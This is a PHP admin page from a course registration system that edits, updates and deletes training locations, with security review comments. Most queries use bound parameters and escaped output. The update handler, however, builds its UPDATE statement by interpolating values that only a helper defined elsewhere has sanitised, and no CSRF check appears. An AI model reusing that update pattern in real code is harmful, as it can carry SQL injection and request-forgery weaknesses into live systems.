<?php
	/*
	 * Bootstrap for the "Edit Location" admin page: load shared code and
	 * configuration, run the access check, and handle the cancel/back redirect
	 * before any HTML is sent.
	 */
	$page_title = 'Edit Location | CES Admin';

	// Common functions used across the course registration system.
	include_once "{$_SERVER['DOCUMENT_ROOT']}/php/common_functions.php";
	// Global config variables.
	include_once "{$_SERVER['DOCUMENT_ROOT']}/php/config.php";
	// phplist config values.
	require_once "{$_SERVER['DOCUMENT_ROOT']}/phplist/config/config.php";

	// Access check for the 'admin' role. It runs before any request data is
	// acted on; what happens to an unauthenticated visitor is decided inside
	// check_if_authenticated(), which is not defined in this file.
	check_if_authenticated('admin');

	// "Cancel" or "Back" was pressed: return to the list page. No output has
	// been produced yet at this point, so the redirect header can still be sent.
	if (isset($_POST['back']) || isset($_POST['cancel'])) {
		header('location:index.php');
		exit;
	}

	// HTML heading common to all pages in the CES admin module.
	include_once "{$_SERVER['DOCUMENT_ROOT']}/admin/php/top-admin.php";
?>

 <article class="ces-admin">
        <h2>CES Admin - Edit Location</h2>

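<?php
	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/nav-admin.php");

	// Open the database connection. The four connection variables are not set
	// in this file; presumably they come from one of the included config files.
	$db = mysqli_connect($mysql_server, $user, $pass, $database);

	/*
	 * Delete handler.
	 *
	 * The posted location_id is request data, so it is validated as a plain
	 * decimal id and bound as a statement parameter instead of being pasted
	 * into the SQL text. The "location has no sessions" rule that the edit form
	 * uses to decide whether to show the delete button is re-checked here, so
	 * the rule is enforced by the server and not only by the markup.
	 *
	 * NOTE(review): no anti-CSRF token is checked in this file for this
	 * state-changing POST; confirm whether check_if_authenticated() or another
	 * include covers that.
	 */
	if(isset($_POST['delete'])){
		$delete_id = (isset($_POST['location_id']) && is_string($_POST['location_id'])) ? $_POST['location_id'] : '';
		$deleted = false;

		// location_sessions() is only called once the id is known to be digits,
		// because its own handling of the argument is not visible from here.
		if (preg_match('/\A[0-9]+\z/', $delete_id) && location_sessions($delete_id) == 0) {
			$delete_stmt = mysqli_prepare($db, "DELETE FROM ces_locations WHERE location_id = ?");
			if ($delete_stmt) {
				// Bound as a string to keep the original comparison against a quoted value.
				mysqli_stmt_bind_param($delete_stmt, 's', $delete_id);
				$deleted = mysqli_stmt_execute($delete_stmt);
				mysqli_stmt_close($delete_stmt);
			}
		}

		if ($deleted) {
			echo "<p class='alert alert-block alert-success'>The Location was deleted successfully</p>\n";
		}
		else {
			echo "<p class='alert alert-block alert-danger'>The Location could not be deleted</p>\n";
		}

		// PHP_SELF is derived from the request URL, so it is HTML-escaped before
		// being written into the action attribute.
		echo "<form method='post' action='" . htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES) . "'>";
		echo "<input type='submit' name='back' value='Back to Location List' class='btn btn-lg btn-block ces-green-btn'>";
		echo "</form>";
	}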

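	/*
	 * Update handler: writes the posted field values back to ces_locations.
	 *
	 * NOTE(review): the UPDATE below interpolates every value without quotes,
	 * so it is only safe (and only valid SQL for text columns) if check_input()
	 * both escapes and quotes what it returns. check_input() is defined outside
	 * this file; confirm that, or move this statement to bound parameters.
	 *
	 * NOTE(review): no anti-CSRF token is checked in this file for this
	 * state-changing POST; confirm whether an include covers that.
	 */
	if(isset($_POST['submit'])){ //form has been submitted, update database with new values
		// PHP_SELF is derived from the request URL, so it is HTML-escaped before
		// being written into the action attribute.
		$back_form = "<form method='post' action='" . htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES) . "'>"
			. "<input type='submit' name='back' value='Back to Location List' class='btn btn-lg btn-block ces-green-btn'>"
			. "</form>";

		// The WHERE clause decides which rows are rewritten, so the id is checked
		// to be a plain decimal number independently of what check_input() does.
		$raw_location_id = (isset($_POST['location_id']) && is_string($_POST['location_id'])) ? $_POST['location_id'] : '';

		if (!preg_match('/\A[0-9]+\z/', $raw_location_id)) {
			echo "<p class='alert alert-danger'>Invalid location id</p>";
			echo $back_form;
		}
		else {
			//2013-04-30 - wsopko - sanitize input before update
			$location_name = check_input($_POST["location_name"]);
			$location_description = check_input($_POST["location_description"]);
			$address_line1 = check_input($_POST["address_line1"]);
			$address_line2 = check_input($_POST["address_line2"]);
			$city = check_input($_POST["city"]);
			$province = check_input($_POST["province"]);
			// Postal codes are stored upper-case with spaces removed.
			$postal_code = strtoupper(str_replace(" ","",check_input($_POST["postal_code"])));
			$seats = check_input($_POST["seats"]);
			$location_id = check_input($_POST["location_id"]);

			$sql = "UPDATE ces_locations
			SET location_name=$location_name,
			location_description=$location_description,
			address_line1=$address_line1,
			address_line2=$address_line2,
			city=$city,
			province=$province,
			postal_code=$postal_code,
			seats=$seats
			WHERE location_id=$location_id";

			if (mysqli_query($db, $sql)){ //updates the database
				//2013-04-30 - wsopko - log the event to event_log table
				log_event("edit_location", "updated location ID $location_id to values seats = $seats");
				echo "<p class='alert alert-success'>Record updated successfully</p>";
				echo $back_form;
				//2016-03-04 - nwmosses - added a return value to updated capacity to show new registrations
				echo updated_capacity($location_id);
			}//if
			else{
				// NOTE(review): the full statement text is handed to print_sql_error();
				// confirm that helper does not show it to end users.
				print_sql_error('Error - location update failed when doing:', $sql);
				echo $back_form;
			}//else
		}//else
	} //if	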
	
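	/*
	 * Edit form: looks up the location named by ?location_id= and prints its
	 * fields in an update form.
	 *
	 * The id arrives in the query string, so it is validated as a plain decimal
	 * number and bound as a statement parameter rather than interpolated into
	 * the SELECT. Every stored value written into the page is HTML-escaped with
	 * ENT_QUOTES, matching what the location_name field already did; the
	 * attributes here are single-quoted, so quotes must be escaped too.
	 */
	if(isset($_GET['location_id'])){ //we can identify the record, location_id is the primary key in the database, print out the record and allow updates

		$requested_id = is_string($_GET['location_id']) ? $_GET['location_id'] : '';
		// PHP_SELF is derived from the request URL; escape it once for all action attributes below.
		$self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES);

		if (!preg_match('/\A[0-9]+\z/', $requested_id)) {
			echo "<p class='alert alert-danger'>Invalid location id</p>";
		}
		else {
			$sql = false;
			$select_stmt = mysqli_prepare($db, "SELECT location_id, location_name, location_description, address_line1, address_line2, city, province, postal_code, telehealth, seats FROM ces_locations WHERE location_id = ?");
			// mysqli_stmt_get_result() needs the mysqlnd driver.
			if ($select_stmt && mysqli_stmt_bind_param($select_stmt, 's', $requested_id) && mysqli_stmt_execute($select_stmt)) {
				$sql = mysqli_stmt_get_result($select_stmt);
			}

			echo "\n<form method='post' action='" . $self . "'>";

			echo "\n\t    <input type='hidden' name='location_id' value='" . htmlspecialchars($requested_id, ENT_QUOTES) . "'>";

			while ($sql && ($query = mysqli_fetch_array($sql))) { ?>

			<div class="form-group">
				<label for='location_name'>Location Name:</label>
				<input class="form-control" type='text' name='location_name' maxlength='50' value='<?php echo htmlspecialchars((string) $query["location_name"], ENT_QUOTES) ?>'>
			</div>
			<div class="form-group">
				<label for='location_description'>Location Description:</label>
				<textarea class="form-control" style="height:auto; resize:none;" rows='5' name='location_description' wrap='soft'><?php echo htmlspecialchars((string) $query["location_description"], ENT_QUOTES) ?></textarea>
			</div>
			<div class="form-group">	
				<label for="address_line1">Address Line 1:</label>
				<input class="form-control" type='text' name='address_line1' maxlength='75' value='<?php echo htmlspecialchars((string) $query["address_line1"], ENT_QUOTES) ?>'>
			</div>
			<div class="form-group">	
				<label for="address_line2">Address Line 2:</label>
				<input class="form-control" type='text' name='address_line2' maxlength='75' value='<?php echo htmlspecialchars((string) $query["address_line2"], ENT_QUOTES) ?>'>
			</div>
			<div class="form-group">	
				<label for="city">City:</label>
				<input class="form-control ces-form-half" type='text' name='city' maxlength='50' value='<?php echo htmlspecialchars((string) $query["city"], ENT_QUOTES) ?>'>
			</div>
			<div class="form-group ces-form-one-quarter">
				<label for="province">Province:</label>	
				<?php
				// NOTE(review): provinces_select() prints its own markup; confirm it escapes the selected value.
				provinces_select('province', $query["province"]); ?>
			</div>
			
			<div class="form-group ces-form-one-quarter">
				<label for="postal_code">Postal Code:</label>
				<input class="form-control" type='text' name='postal_code' maxlength='7' placeholder="A1B 2C3" pattern="[abceghjklmnprstvxyABCEGHJKLMNPRSTVXY][0-9][abceghjklmnprstvwxyzABCEGHJKLMNPRSTVWXYZ] ?[0-9][abceghjklmnprstvwxyzABCEGHJKLMNPRSTVWXYZ][0-9]" value='<?php echo htmlspecialchars((string) $query["postal_code"], ENT_QUOTES) ?>'>
			</div>
			<div class="form-group ces-form-one-quarter">
				<label for="seats">Seats:</label>
				<input class="form-control" type='text' name='seats' maxlength='4' pattern="[0-9]{1,4}" title="Number of seats avalible." value='<?php echo htmlspecialchars((string) $query["seats"], ENT_QUOTES) ?>'>
			</div>
			
			<input type='submit' name='submit' value="Update Location" class="btn btn-lg btn-block ces-green-btn">
			<a href="/admin/locations/" class="btn ces-orange-btn">Cancel</a>
			
			<?php
			
			// The delete button is offered only when location_sessions() reports 0 for this location.
			// NOTE(review): this <form> opens inside the update form; HTML does not
			// allow nested forms, so confirm the intended markup.
			$location_count = location_sessions($query['location_id']);
			if($location_count == 0){
				echo "\n<form  method='post' action='" . $self . "'>";
				echo '<input style="float:right;" class="btn btn-lg btn-block ces-grey-btn" type="submit" name="delete" value="Delete Unused Location" title="Delete Unused Location">';
				echo '<input type="hidden" name="location_id" value="'. htmlspecialchars((string) $query['location_id'], ENT_QUOTES) .'">';
				
			}

			?>

		</form>

		<?php
			} //while
		} //else
	} //if
	
?>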

 
  </article>
    


  </section><!-- #middle-->

</div><!-- #wrapper --> 
 
<?php
// Load /require/footer.php from the document root; require_once stops the
// script if the file is missing and skips it if it was already loaded.
require_once "{$_SERVER['DOCUMENT_ROOT']}/require/footer.php";
?>
